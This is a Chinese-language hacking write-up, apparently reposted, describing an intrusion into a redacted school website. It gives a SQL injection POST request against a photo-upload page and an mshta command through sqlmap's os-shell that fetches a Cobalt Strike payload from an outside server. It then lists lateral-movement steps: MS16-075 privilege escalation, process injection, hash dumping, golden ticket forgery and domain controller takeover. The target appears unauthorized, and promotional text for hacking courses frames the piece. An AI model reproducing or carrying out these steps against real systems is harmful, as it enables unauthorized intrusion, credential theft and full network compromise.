觀看更多零基礎黑客教程,黑客圈新聞,安全面試經驗,實戰技術文
目標站:www.xxxxx.xx
脆弱點:http://www.xxxxx.xx/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp
SQL注入POST包:
<code>
POST /PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp HTTP/1.1Host: www.xxxxx.xxContent-Length: 31Cache-Control: max-age=0Origin: http://www.xxxxx.xxUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://www.xxxxx.xx/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.aspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: ASPSESSIONIDQCABSDCS=DBGDAIKBDEHOPFOFPEAPPLBBConnection: closetxtSchoolYear=108B&txtStdID=1234/<code>
權限:DBA(SA)
內網橫向
CS設置好HTTPS監聽器,生成一個html application文件
然後傳到CS服務器上
sqlmap在os-shell下執行mshta http://20*.*.*.2*:80/download/file.txt
過一會有臺主機上線了
設置好beacon回連時間後檢查下服務器的環境
存在域
補丁安裝的較多
複製信息到https://bugs.hacking8.com/tiquan/檢查下有沒有漏補的
發現漏補MS16-075
在github上找到了該exp的cna插件https://github.com/vysecurity/reflectivepotato.git
clone回來加載到CS裡
獲取到了system權限的beacon
需要注意的是目前進程的父進程是mssql,需要注入到其他用戶的進程下,否則執行一些命令時會提示權限不夠
選擇了WEGO的用戶注入
查看域控
根據備註,判斷AD1為主域控,AD2、AD3為輔域控
抓下hash然後備用
接管域控
利用抓到的hash偽造金票
然後接管AD1
再從AD1上抓hash
在AD1上抓到了域管的明文密碼
然後批量梭哈
拿下運維機
給萌新的一句話:
學習網絡安全沒有你相對那麼難,卻也沒有你想的那麼容易,關鍵看你怎麼學
免費觀看在線實戰滲透教程,體系化視頻提供了,想不想學看你
轉載自:https://mp.weixin.qq.com/s/zcJE7M0BuBJVa8PCV5lxWQ
閱讀更多 暗網視界 的文章